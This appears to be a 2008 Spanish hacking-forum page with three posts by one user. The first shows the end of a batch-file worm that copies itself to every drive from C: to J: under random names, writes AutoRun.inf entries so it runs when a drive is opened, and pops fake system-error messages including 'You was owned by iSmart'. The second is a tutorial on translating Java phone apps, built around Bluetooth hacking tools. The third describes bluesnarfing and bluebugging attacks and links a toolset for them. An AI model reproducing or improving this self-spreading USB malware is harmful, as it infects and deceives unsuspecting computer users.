:msg3 echo MsgBox "Archivo Corrupto.", 16, "Error del Sistema" >%temp%\msgr.vbs start %temp%\msgr.vbs goto :eof
:msg4 echo MsgBox "Error de Datos.Comprobacion de Redundancia Ciclica", 16, "Error del Sistema" >%temp%\msgr.vbs start %temp%\msgr.vbs goto :eof
:msg5 echo MsgBox "Error de Configuracion. No se puede continuar.", 16, "Error del Sistema" >%temp%\msgr.vbs start %temp%\msgr.vbs goto :eof
:msg6 echo MsgBox "El Sistema no Responde.", 16, "Error del Sistema" >%temp%\msgr.vbs start %temp%\msgr.vbs goto :eof
:msg7 echo MsgBox "No hay Memoria suficiente para realizar la Accion.", 16, "Error del Sistema" >%temp%\msgr.vbs start %temp%\msgr.vbs goto :eof
:msg8 echo MsgBox "Visita http://foro.code-makers.es.", 16, "Visitanos..." >%temp%\msgr.vbs start %temp%\msgr.vbs goto :eof
:msg9 echo MsgBox "You was owned by iSmart.", 16, "Hacktool" >%temp%\msgr.vbs start %temp%\msgr.vbs goto :eof
:msg0 echo MsgBox "Fuck You :P.", 16, "Error del Sistema" >%temp%\msgr.vbs start %temp%\msgr.vbs goto :eof
:copiausb if exist C: call :creausb C if exist D: call :creausb D if exist E: call :creausb E if exist F: call :creausb F if exist G: call :creausb G if exist H: call :creausb H if exist I: call :creausb I if exist J: call :creausb J goto :eof
:creausb call :rdn call :name%r% copy %my% "%1:\%nam%.exe" echo [Autorun] > "%1:\AutoRun.inf" echo open="%nam%.exe" >> "%1:\AutoRun.inf" echo action=Abrir Pendrive >> "%1:\AutoRun.inf" echo shellexecute= "\%nam%.exe" >> "%1:\AutoRun.inf" goto :eof
Tambien fijarse que he optimizado bastante la parte de copia USB, esta se me ocurrio como a media noche mientras no podia dormir... Toda la parte de funciones al azar es de mi invencion, y me ha quedado fina Quiero que lo miren, y me digan posibles mejoras, aunque se que me falta algo de uso de %errorlevel% y esas cosas en caso de que algo falle no se salga del programa... Saludos.
|
|
|
29
|
Comunicaciones / Hacking Mobile / [TUTORIAL] Como Traducir Aplicaciones JAVA Moviles ¡¡
|
en: 11 Mayo 2008, 05:38 am
|
TUTORIAL: TRADUCCION DE APLICACIONES JAVA - MOVILESBueno, he querido hacer este tuto desde hace tiempo, debido a que me he encontrado con grandes herramientas tanto para hacking como para otros fines, que son programadas en JAVA, diseñadas para los celulares (moviles) y que vienen en idiomas diferentes del Español. Primero decirles que necesitamos para el procedimiento de Traduccion: - La App a Traducir - Un Descompresor (WinRAR) - Un Descompilador (opcional) - Lectores de Clases Java - Buen conocimiento del lenguaje nativo de la aplicacion, para hacer una buena traduccion. Bien, empecemos: Generalmente los archivos en java viene con extension .jar por lo que debemos cambiarla por .zip o .rar, y proceder a descomprimirla en un directorio para poder trabajar por separado en cada una de las clases que la componen... Entonces aqui es donde se define que tipo de trabajo debemos hacer, ya que nos podemos encontrar aplicaciones que cuentan con un fichero lang, que esencialmente es un archivo de texto plano con todas las strings que usa el programa, hasta archivos .class que vienen compiladas en JAVA Binario... Paso 1. Archivo Lang - Texto PlanoNos Basaremos en la Aplicacion BT Info - Super Bluetooth Hack 1.08 Para este tipo de aplicaciones solo es necesario descomprimirla y una vez ubicado el archivo de lenguaje, este se abre con un editor de textos normal, en este caso nos referimos al bloc de notas... Ubicamos el archivo lang... en este caso una carpeta con los archivos usados por la aplicacion... escogemos el primero y lo abrimos con el bloc de notas... Nos damos cuenta que es el archivo con el listado de los lenguajes que usa el programa, asi que solo traducimos la linea que dice "English" por "Español". En este caso no tenemos que traducir todos los archivos, ya que solo necesitamos modificar el archivo C que es el del lenguaje ingles, el cual vamos a traducir al español, los demas los dejamos como estan... Traducimos todas las frases y cadenas de texto al español, y una vez finalizado este proceso guardamos el archivo... Revisamos si no hay otros archivos por traducir, y cuando estemos listos vamos a "instalar" estos archivos en la aplicacion... Paso 3.Paso 2. Archivo .CLASS - Java BinarioBueno, basicamente es el mismo proceso que el anterior, solo que este implica revisar uno por uno los archivos, ademas de que no lo hacemos con el Bloc de Notas sino con otras herramientas mas avanzadas. Si queremos descompilar los archivos, ver su estructura, codigo fuente y funcionamiento en JAVA, pues usaremos el DJ Java Decompiler, pero como solo vamos a traducirla para nuestro proposito y no mas, pues entonces hacemos uso de otras dos herramientas... InClassTranslator y MobiTrans Los dos programas son muy parecidos en su funcionamiento, pero yo recomiendo usar el MobiTrans, igual eso es decision de ustedes. Ambos programas cuentan con un area en la que muetran el listado de las "strings" o frases en el idioma nativo de la aplicacion, un area donde se muestra la actual selecionada, y una parte donde se debe introducir la traduccion de esa frase o "string". Bueno, usaremos el MobiTrans... Para este caso nos basaremos en el BT File Manager, cuyo archivo de idioma es el "e.class", lo abrimos con el programa y ese nos preguntara que tipo de clase es: Entonces escogemos una clase normal, aunque fijense que hay clases especiales como son las de Macrospace, Handy-Games o Gameloft. Vemos que nos ha cargado toda la lista de "Strings" usadas por la aplicacion, asi que empezamos por la primera, le damos doble click y nos sale un cuadro de dialogo con la original y un espacio para escribir la traduccion... Luego alli escribimos el correspondiente de la Frase original pero en nuestro idioma, y luego damos en el boton OK. Repetimos este paso para todas las frases, y una vez finalizado el proceso procedemos a guardar el trabajo hecho. Solamente damos en el boton de guardar, y en el dialogo que nos sale le damos OK, el resto no lo tocamos para nada. Entonces volvemos al directorio donde teniamos descomprimida la aplicacion, y veremos que se han creado varios archivos... De alli cambiamos el nombre de la clase "e.class" a e.class.bac, ya que esta es la clase original, y el archivo que nos creo el traductor llamado "e.class.ru" lo renombramos a "e.class", y hacemos el mismo proceso con cualquier otro archivo de clase que hayamos traducido con el programa. Una vez se haya finalizado este proceso, estamos listos para "instalar" la traduccion en la aplicacion. Paso 3. "Instalar" la traduccion en la Aplicacion original.Para este paso haremos uso del descompresor que hayan usado para descomprimir la aplicacion (en este caso WinRAR). Abrimos la aplicacion original y alli nos dirigimos hasta el directorio donde se encuentra el archivo original que contiene todas las "strings" o frases que usa la aplicacion, ya sea en texto plano o en .class, para ambos es lo mismo. Aparte y con el explorador de archivos, nos dirigimos hasta la carpeta donde tenemos la aplicacion descomprimida y ya traducida, seleccionamos el archivo ya modificado y lo "arrastramos" hasta el WinRAR. Nos sale un cuadro de dialogo en el que solo debemos de presionar OK. Y si el WinRAR nos dice que si queremos modificar el archivo que ya esta adentro le decimos que SI, luego de esto haremos el mismo proceso para cada uno de los archivos que hayamos traducido o modificado, luego una vez finalizado todo podemos cerrar el Winrar... Y ahora, solo hace falta volver a cambiarle la extension al archivo de .ZIP a .JAR para que pueda ser aceptada por el telefono, instalan la aplicacion el el telefono y....... wala..... ya la tienen en Español. Aqui tienen los dos programas traductores, mas este mismo manual en formato DOC (word)... Link: http://rapidshare.com/files/114045223/TraductoresJAVA-TutorialBySmartgenius.rarDisfrutenlos, y a traducir se dijo Señores Saludos. Tuto by :: SmartGenius :: http://thesmartgenius.wordpress.comSaludos.
|
|
|
30
|
Comunicaciones / Hacking Mobile / BlueJacking - BlueSnarfing - BlueBugging - BlueToothing
|
en: 11 Mayo 2008, 05:37 am
|
BlueJackingBluejacking es el envio de mensajes sin permiso a traves de dispositivos con Bluetooth como celulares, PDAs, portatiles y algunos PCs, enviando una vCard, una Nota o un Contacto que usualmente contiene un mensaje el campo del nombre a otro dispositivo Bluetooth a traves del protocolo OBEX. Bluetooth tiene un rango muy limitado, usualmente alrededor de 10 metros en algunos celulares, pero en portatiles puede superar los 100 metros con algunos transmisores potentes. El Nombre fue originado por un usuario llamado AJACK, quien estando en un banco, busco algun dispositivo Bluetooth encendido y al encontrar un Nokia 7650, le envio un mensaje diciendo “Compra Sony Ericsson”. El lo llamo bluejacking, y asi se ha hecho desde entonces. Ajack junto con Droll posteriormente desarrollaron una utlidad para Symbin UIQ llamada SMan que llego a ser la primera utilidad de bluejacking para un smartphone. Ya recientemente se desarrollaron aplicaciones para otras plataformas como java, de las cuales podemos nombrar al Mobiluck, el EasyJack, y una hecha por la misma compañía Nokia llamada Sensor. Algunos piensan que el termino bluejacking viene de la palabra Bluetooth y la palabra hijacking. Esto sonaria logico, pero un bluejacker no hace hijack con nada: el o ella unicamente usa una opcion en el envio y el dispositivo recipiente (receptor). Un bluejacker no esta en la capacidad de tomar control de tu telefono o de robar informacion personal. ne Mas bien esta orientado a hacer bromas o molestar a alguien, y tal vez de alli es que viene el termino. El Bluejacking es algo gracioso, porque la persona bluejackeada no sabe lo que esta pasando, y piensa que su telefono esta funcionando mal . Usualmente un bluejacker solo envia un mensaje de texto, pero con los telefonos modernos es possible hasta enviar imagines o sonidos tambien. Esto del Bluejacking a sido usado para Tecnicas de marketing en algunos centros comerciales quienes se hacen publicidad a traves de este medio. Pero con el incremento de los dispositivos con soporte bluetooth , algunos de estos dispositivos (especialmente PDAs y alunos moviles con Symbian) se han vuelto vulnerables, desde ataques de virus, hasta el control total del dispositivo a traves de programas Troyanos. BlueSnarfingBluesnarfing es el robo de informacion de un dispositivo inalambrico a traves de una conexion Bluetooth, ya sea entre telefonos, portatiles o PDAs. Esto permite acceso al calendario, la lista de contactos, correos y mensajes de texto. Bluesnarfing es mucho mas serio en relacion al Bluejacking, pero ambos “explotan” otros dispositivos Bluetooth sin su conocimiento. Cualquier dispositivo que tenga encendido el Bluetooth y este se encuentre en Modo Descubierto (osea que puede ser encontrado por otros dispositivos en el rango) puede ser atacado. Apagando esta opcion puede protegerse de la posibilidad de ser Bluesnarfiado. Siendo esto una invasión de la privacidad, el Bluesnarfing es ilegal en algunos paises. Dentro de este Rango de Herramientas Encontramos al Mismo BT Info (Super Bluetooth Hack), el BT File Manager, el BT Explorer, Miyux y otra gran variedad de utilidades. BlueBuggingAlguna gente considera el Bluebugging como una forma de Bluesnarfing. Pero la naturaleza de este es muy diferente. Blue Bugging fue inventado en 2004, mas o menos un año despues de que empezara el Bluesnarfing. Mientras el bluesnarfing se trata de robar cosas o archivos del dispositivo de la victima, el Blue Bugging hace un trabajo diferente. Toma el control del movil de la victima, y por medio de comandos hace lo que el BlueBugger desee (dentro de este rango tenemos al BT Info o Super Bluetooth Hack). Para decirlo en palabras faciles, significa que el bluebugger toma el control de tu telefono, y lo usa para enviar mensajes o para hacer una llamada. Mientras al principio el bluebugging requeria que el bugger(literalmente) usara un dispositivo previamente acomodado, las nuevas herramientas del bluebugging han hecho la mayor parte del trabajo, lo que significa que cualquiera con el conocimiento y la herramienta adecuada puede tomar control de tu telefono. Las posibilidades y consecuencias de esto, estan a la Imaginación. Bluetiming o ToothingPodria decirse que es una variante del BlueJacking, la cual se dice, es para promover encuentros del tipo sexual (citas, encuentros y esas cosas) mediante la cual un dispositivo Bluetooth es usado para “descubrir” otros dispositivos bluetooth en el rango, y les envia un mensaje sugestivo, algo asi como: Hablamos ? Donde nos vemos ?. Se crea una red de encuentros furtivos con otros dispositivos bluetooth, generalmente en areas con mucha afluencia de publico como Centros Comerciales y parecidos, la cual no solo es para encuentros y charlas, sino tambien para compartir cosas, lo que a logrado que se desarrollen aplicaciones dentro de la categoría MoSoSo (Software para sociabilidad movil, Mobile Social Software en Ingles.) dentro de las cuales podemos contar el Mobiluck, el Bluejack, y los recientes Chat2u o Bluetooth Messenger. Tambien tenemos aquí al “Sensor” de Nokia. Fuente: BlueJacking Tools Traducción y Adaptacion by :: Smartgenius ::Aqui hay un Set de Herramientas para usar, con este tipo de ataques http://foro.elhacker.net/hacking_mobile/herramientas_bluejacking_bluesnarfingetc-t211880.0.htmlSaludos.
|
|
|
|
|
|
|